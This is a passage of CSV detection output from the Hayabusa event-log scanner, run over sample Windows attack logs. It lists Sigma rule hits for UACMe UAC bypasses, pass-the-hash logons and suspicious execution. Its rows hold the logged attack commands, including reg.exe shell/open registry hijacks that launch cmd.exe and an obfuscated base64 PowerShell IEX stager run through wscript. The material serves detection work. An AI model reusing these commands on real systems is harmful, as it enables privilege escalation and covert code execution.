",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx -2019-08-04 00:16:30.389 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx -2019-08-04 00:16:31.012 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 342 00000280644BB040 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx -2019-08-04 00:16:31.779 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx -2019-08-04 00:16:31.779 +09:00,MSEDGEWIN10,1,high,CMSTP UAC Bypass via COM Object Access,,rules/sigma/process_creation/win_cmstp_com_object_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx -2019-08-04 16:26:33.984 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 43 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx -2019-08-04 16:26:33.984 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx -2019-08-04 16:26:34.302 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 342 0000028064468040 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx -2019-08-04 16:26:34.689 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 330 000002806444C490 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx -2019-08-04 16:26:35.182 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\DllHost.exe /Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx -2019-08-04 16:26:35.182 +09:00,MSEDGEWIN10,1,high,CMSTP UAC Bypass via COM Object Access,,rules/sigma/process_creation/win_cmstp_com_object_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx -2019-08-04 17:56:16.228 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 45 c:\Windows\SysWOW64\notepad.exe : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx -2019-08-04 17:56:16.228 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx -2019-08-04 17:56:16.650 +09:00,MSEDGEWIN10,13,high,Shell Open Registry Keys Manipulation,,rules/sigma/registry_event/win_registry_shell_open_keys_manipulation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx -2019-08-04 17:56:16.967 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 294 0000028064421EA0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx -2019-08-04 17:56:18.321 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\ChangePk.exe"" : Path: C:\Windows\System32\changepk.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\slui.exe"" 0x03",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx -2019-08-04 17:56:18.321 +09:00,MSEDGEWIN10,1,high,UAC Bypass Using ChangePK and SLUI,,rules/sigma/process_creation/win_uac_bypass_changepk_slui.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx -2019-08-04 17:56:20.446 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 444 00000280644250C0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx -2019-08-04 17:56:20.937 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\SystemSettingsAdminFlows.exe"" EnterProductKey : Path: C:\Windows\System32\SystemSettingsAdminFlows.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\ImmersiveControlPanel\SystemSettings.exe"" -ServerName:microsoft.windows.immersivecontrolpanel",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx -2019-08-04 17:56:22.193 +09:00,MSEDGEWIN10,12,medium,Removal of Potential COM Hijacking Registry Keys,,rules/sigma/registry_event/sysmon_removal_com_hijacking_registry_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx -2019-08-04 18:10:28.612 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 53 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx -2019-08-04 18:10:28.612 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx -2019-08-04 18:10:28.807 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\Folder\shell\open\command /v ""DelegateExecute"" /t REG_SZ /d """" /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: sihost.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx -2019-08-04 18:10:28.925 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\Folder\shell\open\command /v """" /t REG_SZ /d ""C:\Windows\system32\cmd.exe"" /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: sihost.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx -2019-08-04 18:10:29.409 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdclt.exe"" : Path: C:\Windows\System32\sdclt.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 53",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx -2019-08-04 18:10:29.431 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 300 000002806445E5C0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx -2019-08-04 18:10:30.395 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdclt.exe"" : Path: C:\Windows\System32\sdclt.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 53",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx -2019-08-04 18:10:30.395 +09:00,MSEDGEWIN10,1,medium,High Integrity Sdclt Process,,rules/sigma/process_creation/sysmon_high_integrity_sdclt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx -2019-08-04 18:10:30.752 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\control.exe"" /name Microsoft.BackupAndRestoreCenter : Path: C:\Windows\System32\control.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\sdclt.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx -2019-08-04 18:10:30.752 +09:00,MSEDGEWIN10,1,medium,Sdclt Child Processes,,rules/sigma/process_creation/sysmon_sdclt_child_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx -2019-08-04 18:10:30.972 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\control.exe"" /name Microsoft.BackupAndRestoreCenter",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx -2019-08-04 18:10:35.402 +09:00,MSEDGEWIN10,12,medium,Removal of Potential COM Hijacking Registry Keys,,rules/sigma/registry_event/sysmon_removal_com_hijacking_registry_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx -2019-08-04 18:33:57.582 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 55 c:\Windows\SysWOW64\notepad.exe : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx -2019-08-04 18:33:57.582 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx -2019-08-04 18:33:58.087 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\windows\system32\cmd.exe ""C:\Windows\system32\osk.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 55 c:\Windows\SysWOW64\notepad.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx -2019-08-04 18:33:58.127 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: c:\Windows\SysWOW64\notepad.exe : Path: C:\Users\IEUser\AppData\Local\Temp\Fubuki.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 55 c:\Windows\SysWOW64\notepad.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx -2019-08-04 18:33:58.127 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx -2019-08-04 18:33:58.713 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\msconfig.exe"" -5 : Path: C:\Windows\System32\msconfig.exe : User: MSEDGEWIN10\IEUser : Parent Command: c:\Windows\SysWOW64\notepad.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx -2019-08-04 18:33:58.774 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 322 000002806447A490 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx -2019-08-04 18:33:59.225 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\msconfig.exe"" -5 : Path: C:\Windows\System32\msconfig.exe : User: MSEDGEWIN10\IEUser : Parent Command: c:\Windows\SysWOW64\notepad.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx -2019-08-04 19:16:29.676 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 56 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx -2019-08-04 19:16:29.676 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx -2019-08-04 19:16:31.175 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\shell\open\command /v ""DelegateExecute"" /t REG_SZ /d """" /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: sihost.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx -2019-08-04 19:16:31.485 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\shell\open\command /v """" /t REG_SZ /d ""C:\Windows\system32\cmd.exe /c start C:\Windows\system32\cmd.exe"" /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: sihost.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx -2019-08-04 19:16:31.949 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\WSReset.exe"" : Path: C:\Windows\System32\WSReset.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 56",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx -2019-08-04 19:16:32.001 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 312 000002806444CB40 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx -2019-08-04 19:16:32.438 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\WSReset.exe"" : Path: C:\Windows\System32\WSReset.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 56",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx -2019-08-04 19:16:32.438 +09:00,MSEDGEWIN10,1,high,UAC Bypass WSReset,,rules/sigma/process_creation/win_uac_bypass_wsreset.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx -2019-08-04 19:16:50.009 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c start C:\Windows\system32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\WSReset.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx -2019-08-04 19:16:50.009 +09:00,MSEDGEWIN10,1,high,Wsreset UAC Bypass,,rules/sigma/process_creation/win_wsreset_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx -2019-08-04 19:16:50.009 +09:00,MSEDGEWIN10,1,high,Bypass UAC via WSReset.exe,,rules/sigma/process_creation/win_uac_wsreset.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx -2019-08-04 19:16:50.455 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c start C:\Windows\system32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx -2019-08-04 19:16:55.299 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\shell\open\command /v """" /t REG_SZ /d ""C:\Windows\system32\cmd.exe /c start C:\Windows\system32\cmd.exe"" /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: sihost.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx -2019-08-04 19:16:55.446 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\shell\open\command /v ""DelegateExecute"" /t REG_SZ /d ""{4ED3A719-CEA8-4BD9-910D-E252F997AFC2}"" /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: sihost.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx -2019-08-05 18:39:30.697 +09:00,MSEDGEWIN10,4624,informational,Logon Type 9 - NewCredentials,User: IEUser : Workstation: - : IP Address: ::1 : Port: 0 : LogonID: 0x38f87e : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-9-NewInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Invoke_TokenDuplication_UAC_Bypass4624.evtx -2019-08-05 18:39:30.697 +09:00,MSEDGEWIN10,4624,medium,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Invoke_TokenDuplication_UAC_Bypass4624.evtx -2019-08-05 18:39:30.697 +09:00,MSEDGEWIN10,4624,high,Successful Overpass the Hash Attempt,,rules/sigma/builtin/security/win_overpass_the_hash.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Invoke_TokenDuplication_UAC_Bypass4624.evtx -2019-08-14 20:53:29.688 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\windows\explorer.exe"" shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab} : Path: C:\Windows\explorer.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx -2019-08-14 20:53:30.010 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding : Path: C:\Windows\explorer.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx -2019-08-14 20:53:30.022 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""c:\windows\system32\wscript.exe"" /E:vbs c:\windows\temp\icon.ico ""powershell -exec bypass -c """"IEX ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFhYPUlFWCgoJ1snICsgW2NoYXJdMHg1MyArICd5c3RlbS5UZXh0LkVuYycgKyBbY2hhcl0weDZmICsgJ2RpbmddOjpBJyArIFtjaGFyXTB4NTMgKyAnQ0lJLkdldCcgKyBbY2hhcl0weDUzICsgJ3RyaW5nKFsnICsgW2NoYXJdMHg1MyArICd5c3RlbS5DJyArIFtjaGFyXTB4NmYgKyAnbnZlcnRdOjpGcicgKyBbY2hhcl0weDZmICsgJ21CYXNlNicgKyBbY2hhcl0weDM0ICsgJycgKyBbY2hhcl0weDUzICsgJ3RyaW5nKChnZXQtYycgKyBbY2hhcl0weDZmICsgJ250ZW50IC1wYXRoICcnYzpcd2luZCcgKyBbY2hhcl0weDZmICsgJ3dzXHRlbXBccGljdHVyZS5qcGcnJykpKScpKTskQkI9SUVYKCgnc3RhcnQtc2xlZXAgMTA7JHM9JFhYOyRkID0gQCgpOyR2ID0gMDskYyA9IDA7d2hpbGUoJGMgLW5lICRzLmxlbmd0aCl7JHY9KCR2KjUyKSsoW0ludDMyXVtjaGFyXSRzWyRjXS0nICsgW2NoYXJdMHgzNCArICcwKTtpZigoKCRjKzEpJTMpIC1lcSAwKXt3aGlsZSgkdiAtbmUgMCl7JHZ2PSR2JTI1NjtpZigkdnYgLWd0IDApeyRkKz1bY2hhcl1bSW50MzJdJHZ2fSR2PVtJbnQzMl0oJHYvMjU2KX19JGMrPTE7fTtbYXJyYXldOjpSZXZlcnNlKCRkKTtJRVgoWycgKyBbY2hhcl0weDUzICsgJ3RyaW5nXTo6SicgKyBbY2hhcl0weDZmICsgJ2luKCcnJycsJGQpKTs7JykpO0lFWCgkQkIp')))"""""" : Path: C:\Windows\System32\wscript.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx -2019-08-14 20:53:30.022 +09:00,MSEDGEWIN10,1,medium,Too Long PowerShell Commandlines,,rules/sigma/process_creation/sysmon_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx -2019-08-14 20:53:30.022 +09:00,MSEDGEWIN10,1,high,FromBase64String Command Line,,rules/sigma/process_creation/win_powershell_frombase64string.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx -2019-08-14 20:53:30.022 +09:00,MSEDGEWIN10,1,high,Suspicious Script Execution From Temp Folder,,rules/sigma/process_creation/win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx -2019-08-14 21:17:14.614 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\rundll32.exe"" zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab} : Path: C:\Windows\System32\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx -2019-08-14 21:17:14.614 +09:00,MSEDGEWIN10,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx -2019-08-14 21:17:14.893 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""c:\windows\system32\wscript.exe"" /E:vbs c:\windows\temp\icon.ico ""powershell -exec bypass -c """"IEX ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFhYPUlFWCgoJ1snICsgW2NoYXJdMHg1MyArICd5c3RlbS5UZXh0LkVuYycgKyBbY2hhcl0weDZmICsgJ2RpbmddOjpBJyArIFtjaGFyXTB4NTMgKyAnQ0lJLkdldCcgKyBbY2hhcl0weDUzICsgJ3RyaW5nKFsnICsgW2NoYXJdMHg1MyArICd5c3RlbS5DJyArIFtjaGFyXTB4NmYgKyAnbnZlcnRdOjpGcicgKyBbY2hhcl0weDZmICsgJ21CYXNlNicgKyBbY2hhcl0weDM0ICsgJycgKyBbY2hhcl0weDUzICsgJ3RyaW5nKChnZXQtYycgKyBbY2hhcl0weDZmICsgJ250ZW50IC1wYXRoICcnYzpcd2luZCcgKyBbY2hhcl0weDZmICsgJ3dzXHRlbXBccGljdHVyZS5qcGcnJykpKScpKTskQkI9SUVYKCgnc3RhcnQtc2xlZXAgMTA7JHM9JFhYOyRkID0gQCgpOyR2ID0gMDskYyA9IDA7d2hpbGUoJGMgLW5lICRzLmxlbmd0aCl7JHY9KCR2KjUyKSsoW0ludDMyXVtjaGFyXSRzWyRjXS0nICsgW2NoYXJdMHgzNCArICcwKTtpZigoKCRjKzEpJTMpIC1lcSAwKXt3aGlsZSgkdiAtbmUgMCl7JHZ2PSR2JTI1NjtpZigkdnYgLWd0IDApeyRkKz1bY2hhcl1bSW50MzJdJHZ2fSR2PVtJbnQzMl0oJHYvMjU2KX19JGMrPTE7fTtbYXJyYXldOjpSZXZlcnNlKCRkKTtJRVgoWycgKyBbY2hhcl0weDUzICsgJ3RyaW5nXTo6SicgKyBbY2hhcl0weDZmICsgJ2luKCcnJycsJGQpKTs7JykpO0lFWCgkQkIp')))"""""" : Path: C:\Windows\System32\wscript.exe : User: MSEDGEWIN10\IEUser : Parent Command: 